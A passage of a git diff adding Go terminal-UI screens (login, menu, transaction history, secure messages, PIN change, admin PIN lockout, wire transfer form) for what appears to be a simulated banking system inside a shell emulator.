case tea.KeyBackspace:
|
||||||
|
if len(m.pin) > 0 {
|
||||||
|
m.pin = m.pin[:len(m.pin)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.pin) < 20 {
|
||||||
|
m.pin += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m adminModel) View() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("SYSTEM ADMINISTRATION"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
if m.locked {
|
||||||
|
b.WriteString(errorStyle.Render(" *** ACCESS DENIED ***"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(errorStyle.Render(" MAXIMUM AUTHENTICATION ATTEMPTS EXCEEDED"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(errorStyle.Render(" TERMINAL LOCKED - INCIDENT LOGGED"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(" SECURITY ALERT HAS BEEN DISPATCHED TO:"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" - INFORMATION SECURITY DEPT"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" - BRANCH SECURITY OFFICER"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" - FEDERAL RESERVE OVERSIGHT"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" INCIDENT REF: SEC-%d-ADMIN-BRUTE", 20240000+m.attempts)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" IEF4271I UNAUTHORIZED ACCESS ATTEMPT - ABEND S0C4"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" IEF4272I JOB SECADMIN STEP0001 - COND CODE 4088"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
} else {
|
||||||
|
b.WriteString(titleStyle.Render(" RESTRICTED ACCESS - ADMINISTRATOR ONLY"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(" THIS FUNCTION REQUIRES LEVEL 5 SECURITY CLEARANCE."))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" ALL ACCESS ATTEMPTS ARE LOGGED AND AUDITED."))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
if m.attempts > 0 {
|
||||||
|
b.WriteString(errorStyle.Render(fmt.Sprintf(" INVALID CREDENTIALS (%d OF 3 ATTEMPTS)", m.attempts)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString(titleStyle.Render(" ADMIN PIN: "))
|
||||||
|
masked := strings.Repeat("*", len(m.pin))
|
||||||
|
b.WriteString(inputStyle.Render(masked))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ESC TO RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
111
internal/shell/banking/screen_changepin.go
Normal file
111
internal/shell/banking/screen_changepin.go
Normal file
@@ -0,0 +1,111 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
type changePinModel struct {
|
||||||
|
input string
|
||||||
|
stage int // 0=old, 1=new, 2=confirm, 3=done
|
||||||
|
newPin string
|
||||||
|
done bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func newChangePinModel() changePinModel {
|
||||||
|
return changePinModel{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m changePinModel) Update(msg tea.Msg) (changePinModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.stage == 3 {
|
||||||
|
m.done = true
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
switch m.stage {
|
||||||
|
case 0:
|
||||||
|
if m.input != "" {
|
||||||
|
m.stage = 1
|
||||||
|
m.input = ""
|
||||||
|
}
|
||||||
|
case 1:
|
||||||
|
if len(m.input) >= 4 {
|
||||||
|
m.newPin = m.input
|
||||||
|
m.stage = 2
|
||||||
|
m.input = ""
|
||||||
|
}
|
||||||
|
case 2:
|
||||||
|
if m.input == m.newPin {
|
||||||
|
m.stage = 3
|
||||||
|
} else {
|
||||||
|
m.input = ""
|
||||||
|
m.newPin = ""
|
||||||
|
m.stage = 1
|
||||||
|
}
|
||||||
|
}
|
||||||
|
case tea.KeyEscape:
|
||||||
|
m.done = true
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.input) > 0 {
|
||||||
|
m.input = m.input[:len(m.input)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.input) < 12 {
|
||||||
|
m.input += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m changePinModel) View() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("CHANGE PIN"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
if m.stage == 3 {
|
||||||
|
b.WriteString(titleStyle.Render(" PIN CHANGED SUCCESSFULLY"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(" YOUR NEW PIN IS NOW ACTIVE."))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" PLEASE USE YOUR NEW PIN FOR ALL FUTURE TRANSACTIONS."))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
|
||||||
|
} else {
|
||||||
|
prompts := []string{" CURRENT PIN: ", " NEW PIN: ", " CONFIRM PIN: "}
|
||||||
|
for i := 0; i < m.stage; i++ {
|
||||||
|
b.WriteString(baseStyle.Render(prompts[i]))
|
||||||
|
b.WriteString(baseStyle.Render(strings.Repeat("*", 4)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
if m.stage < 3 {
|
||||||
|
b.WriteString(titleStyle.Render(prompts[m.stage]))
|
||||||
|
masked := strings.Repeat("*", len(m.input))
|
||||||
|
b.WriteString(inputStyle.Render(masked))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
b.WriteString("\n")
|
||||||
|
if m.stage == 1 {
|
||||||
|
b.WriteString(dimStyle.Render(" PIN MUST BE AT LEAST 4 CHARACTERS"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ESC TO RETURN TO MAIN MENU"))
|
||||||
|
}
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
152
internal/shell/banking/screen_history.go
Normal file
152
internal/shell/banking/screen_history.go
Normal file
@@ -0,0 +1,152 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
type historyModel struct {
|
||||||
|
accounts []Account
|
||||||
|
transactions map[string][]Transaction
|
||||||
|
selected int
|
||||||
|
page int
|
||||||
|
pageSize int
|
||||||
|
choosing bool
|
||||||
|
choice string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newHistoryModel(accounts []Account, transactions map[string][]Transaction) historyModel {
|
||||||
|
return historyModel{
|
||||||
|
accounts: accounts,
|
||||||
|
transactions: transactions,
|
||||||
|
choosing: true,
|
||||||
|
pageSize: 12,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m historyModel) Update(msg tea.Msg) (historyModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.choosing {
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
for i := range m.accounts {
|
||||||
|
if m.choice == fmt.Sprintf("%d", i+1) {
|
||||||
|
m.selected = i
|
||||||
|
m.choosing = false
|
||||||
|
m.page = 0
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if m.choice == "0" {
|
||||||
|
m.choice = "back"
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.choice) > 0 {
|
||||||
|
m.choice = m.choice[:len(m.choice)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= '0' && ch[0] <= '9' {
|
||||||
|
m.choice += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
switch keyMsg.String() {
|
||||||
|
case "n", "N":
|
||||||
|
acctNum := m.accounts[m.selected].Number
|
||||||
|
txns := m.transactions[acctNum]
|
||||||
|
maxPage := (len(txns) - 1) / m.pageSize
|
||||||
|
if m.page < maxPage {
|
||||||
|
m.page++
|
||||||
|
}
|
||||||
|
case "p", "P":
|
||||||
|
if m.page > 0 {
|
||||||
|
m.page--
|
||||||
|
}
|
||||||
|
case "b", "B":
|
||||||
|
m.choosing = true
|
||||||
|
m.choice = ""
|
||||||
|
default:
|
||||||
|
m.choice = "back"
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m historyModel) View() string {
|
||||||
|
if m.choosing {
|
||||||
|
return m.viewChooseAccount()
|
||||||
|
}
|
||||||
|
return m.viewHistory()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m historyModel) viewChooseAccount() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("TRANSACTION HISTORY"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" SELECT ACCOUNT:"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
for i, acct := range m.accounts {
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%d] %s - %s",
|
||||||
|
i+1, acct.Number, acct.Type)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" [0] RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ENTER SELECTION: "))
|
||||||
|
b.WriteString(inputStyle.Render(m.choice))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m historyModel) viewHistory() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
acct := m.accounts[m.selected]
|
||||||
|
txns := m.transactions[acct.Number]
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText(fmt.Sprintf("TRANSACTION HISTORY - %s (%s)", acct.Number, acct.Type)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-12s %-40s %14s", "DATE", "DESCRIPTION", "AMOUNT")))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 68)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
start := m.page * m.pageSize
|
||||||
|
end := min(start+m.pageSize, len(txns))
|
||||||
|
|
||||||
|
for _, txn := range txns[start:end] {
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" %-12s %-40s %14s",
|
||||||
|
txn.Date, txn.Description, formatCurrency(txn.Amount))))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
totalPages := (len(txns) + m.pageSize - 1) / m.pageSize
|
||||||
|
b.WriteString(dimStyle.Render(fmt.Sprintf(" PAGE %d OF %d", m.page+1, totalPages)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" [N]EXT PAGE [P]REV PAGE [B]ACK ANY OTHER KEY = MAIN MENU"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
103
internal/shell/banking/screen_login.go
Normal file
103
internal/shell/banking/screen_login.go
Normal file
@@ -0,0 +1,103 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
type loginModel struct {
|
||||||
|
accountNum string
|
||||||
|
pin string
|
||||||
|
stage int // 0 = account, 1 = pin, 2 = authenticating
|
||||||
|
bankName string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newLoginModel(bankName string) loginModel {
|
||||||
|
return loginModel{bankName: bankName}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m loginModel) Update(msg tea.Msg) (loginModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
if m.stage == 0 && m.accountNum != "" {
|
||||||
|
m.stage = 1
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
if m.stage == 1 && m.pin != "" {
|
||||||
|
m.stage = 2
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if m.stage == 0 && len(m.accountNum) > 0 {
|
||||||
|
m.accountNum = m.accountNum[:len(m.accountNum)-1]
|
||||||
|
} else if m.stage == 1 && len(m.pin) > 0 {
|
||||||
|
m.pin = m.pin[:len(m.pin)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 {
|
||||||
|
if m.stage == 0 && len(m.accountNum) < 20 {
|
||||||
|
m.accountNum += ch
|
||||||
|
} else if m.stage == 1 && len(m.pin) < 12 {
|
||||||
|
m.pin += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m loginModel) View() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText(m.bankName + " ONLINE BANKING"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("AUTHORIZED ACCESS ONLY"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
b.WriteString(titleStyle.Render(" ACCOUNT NUMBER: "))
|
||||||
|
if m.stage == 0 {
|
||||||
|
b.WriteString(inputStyle.Render(m.accountNum))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
} else {
|
||||||
|
b.WriteString(baseStyle.Render(m.accountNum))
|
||||||
|
}
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
if m.stage >= 1 {
|
||||||
|
b.WriteString(titleStyle.Render(" PIN: "))
|
||||||
|
masked := strings.Repeat("*", len(m.pin))
|
||||||
|
if m.stage == 1 {
|
||||||
|
b.WriteString(inputStyle.Render(masked))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
} else {
|
||||||
|
b.WriteString(baseStyle.Render(masked))
|
||||||
|
}
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.stage == 2 {
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" AUTHENTICATING..."))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" WARNING: UNAUTHORIZED ACCESS TO THIS SYSTEM IS A FEDERAL CRIME"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(fmt.Sprintf(" UNDER 18 U.S.C. %s 1030. ALL ACTIVITY IS MONITORED AND LOGGED.", "\u00A7")))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
80
internal/shell/banking/screen_menu.go
Normal file
80
internal/shell/banking/screen_menu.go
Normal file
@@ -0,0 +1,80 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
type menuModel struct {
|
||||||
|
choice string
|
||||||
|
unread int
|
||||||
|
bankName string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newMenuModel(bankName string, unreadCount int) menuModel {
|
||||||
|
return menuModel{bankName: bankName, unread: unreadCount}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m menuModel) Update(msg tea.Msg) (menuModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.choice) > 0 {
|
||||||
|
m.choice = m.choice[:len(m.choice)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 {
|
||||||
|
if len(m.choice) < 10 {
|
||||||
|
m.choice += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m menuModel) View() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("MAIN MENU"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
items := []struct {
|
||||||
|
num string
|
||||||
|
desc string
|
||||||
|
}{
|
||||||
|
{"1", "ACCOUNT SUMMARY"},
|
||||||
|
{"2", "ACCOUNT DETAIL / TRANSACTIONS"},
|
||||||
|
{"3", "WIRE TRANSFER"},
|
||||||
|
{"4", "TRANSACTION HISTORY"},
|
||||||
|
{"5", fmt.Sprintf("SECURE MESSAGES (%d UNREAD)", m.unread)},
|
||||||
|
{"6", "CHANGE PIN"},
|
||||||
|
{"7", "LOGOUT"},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, item := range items {
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%s] %s", item.num, item.desc)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" ENTER SELECTION: "))
|
||||||
|
b.WriteString(inputStyle.Render(m.choice))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
122
internal/shell/banking/screen_messages.go
Normal file
122
internal/shell/banking/screen_messages.go
Normal file
@@ -0,0 +1,122 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
type messagesModel struct {
|
||||||
|
messages []SecureMessage
|
||||||
|
viewing int // -1 = list, >= 0 = detail
|
||||||
|
choice string
|
||||||
|
}
|
||||||
|
|
||||||
|
func newMessagesModel(messages []SecureMessage) messagesModel {
|
||||||
|
return messagesModel{messages: messages, viewing: -1}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m messagesModel) Update(msg tea.Msg) (messagesModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.viewing >= 0 {
|
||||||
|
// In detail view, any key goes back to list.
|
||||||
|
m.viewing = -1
|
||||||
|
m.choice = ""
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
if m.choice == "0" {
|
||||||
|
m.choice = "back"
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
for i := range m.messages {
|
||||||
|
if m.choice == fmt.Sprintf("%d", i+1) {
|
||||||
|
m.viewing = i
|
||||||
|
m.messages[i].Unread = false
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
m.choice = ""
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.choice) > 0 {
|
||||||
|
m.choice = m.choice[:len(m.choice)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= '0' && ch[0] <= '9' && len(m.choice) < 2 {
|
||||||
|
m.choice += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m messagesModel) View() string {
|
||||||
|
if m.viewing >= 0 {
|
||||||
|
return m.viewDetail()
|
||||||
|
}
|
||||||
|
return m.viewList()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m messagesModel) viewList() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("SECURE MESSAGES"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
b.WriteString(titleStyle.Render(fmt.Sprintf(" %-4s %-3s %-12s %-22s %s", "#", "", "DATE", "FROM", "SUBJECT")))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(dimStyle.Render(" " + strings.Repeat("-", 68)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
for i, msg := range m.messages {
|
||||||
|
marker := " "
|
||||||
|
if msg.Unread {
|
||||||
|
marker = " * "
|
||||||
|
}
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" [%d]%s%-12s %-22s %s",
|
||||||
|
i+1, marker, msg.Date, msg.From, msg.Subj)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" [0] RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" SELECT MESSAGE: "))
|
||||||
|
b.WriteString(inputStyle.Render(m.choice))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m messagesModel) viewDetail() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
msg := m.messages[m.viewing]
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText(fmt.Sprintf("MESSAGE #%d", m.viewing+1)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(msg.Body))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MESSAGE LIST"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
198
internal/shell/banking/screen_transfer.go
Normal file
198
internal/shell/banking/screen_transfer.go
Normal file
@@ -0,0 +1,198 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
tea "github.com/charmbracelet/bubbletea"
|
||||||
|
)
|
||||||
|
|
||||||
|
const (
|
||||||
|
transferStepRouting = iota
|
||||||
|
transferStepDest
|
||||||
|
transferStepBeneficiary
|
||||||
|
transferStepBankName
|
||||||
|
transferStepAmount
|
||||||
|
transferStepMemo
|
||||||
|
transferStepConfirm
|
||||||
|
transferStepAuthCode
|
||||||
|
transferStepComplete
|
||||||
|
)
|
||||||
|
|
||||||
|
var transferPrompts = []string{
|
||||||
|
" ROUTING NUMBER (ABA): ",
|
||||||
|
" DESTINATION ACCOUNT: ",
|
||||||
|
" BENEFICIARY NAME: ",
|
||||||
|
" RECEIVING BANK NAME: ",
|
||||||
|
" AMOUNT (USD): ",
|
||||||
|
" MEMO / REFERENCE: ",
|
||||||
|
"",
|
||||||
|
" AUTHORIZATION CODE: ",
|
||||||
|
}
|
||||||
|
|
||||||
|
type transferModel struct {
|
||||||
|
step int
|
||||||
|
fields [8]string // indexed by step
|
||||||
|
transfer WireTransfer
|
||||||
|
confirm string // y/n input for confirm step
|
||||||
|
}
|
||||||
|
|
||||||
|
func newTransferModel() transferModel {
|
||||||
|
return transferModel{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m transferModel) Update(msg tea.Msg) (transferModel, tea.Cmd) {
|
||||||
|
keyMsg, ok := msg.(tea.KeyMsg)
|
||||||
|
if !ok {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.step == transferStepComplete {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.step == transferStepConfirm {
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
switch strings.ToUpper(m.confirm) {
|
||||||
|
case "Y", "YES":
|
||||||
|
m.step = transferStepAuthCode
|
||||||
|
case "N", "NO":
|
||||||
|
m.confirm = "cancelled"
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.confirm) > 0 {
|
||||||
|
m.confirm = m.confirm[:len(m.confirm)-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.confirm) < 3 {
|
||||||
|
m.confirm += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
switch keyMsg.Type {
|
||||||
|
case tea.KeyEnter:
|
||||||
|
val := strings.TrimSpace(m.fields[m.step])
|
||||||
|
if val == "" {
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
if m.step == transferStepAuthCode {
|
||||||
|
m.transfer.AuthCode = val
|
||||||
|
m.step = transferStepComplete
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
switch m.step {
|
||||||
|
case transferStepRouting:
|
||||||
|
m.transfer.RoutingNumber = val
|
||||||
|
case transferStepDest:
|
||||||
|
m.transfer.DestAccount = val
|
||||||
|
case transferStepBeneficiary:
|
||||||
|
m.transfer.Beneficiary = val
|
||||||
|
case transferStepBankName:
|
||||||
|
m.transfer.BankName = val
|
||||||
|
case transferStepAmount:
|
||||||
|
m.transfer.Amount = val
|
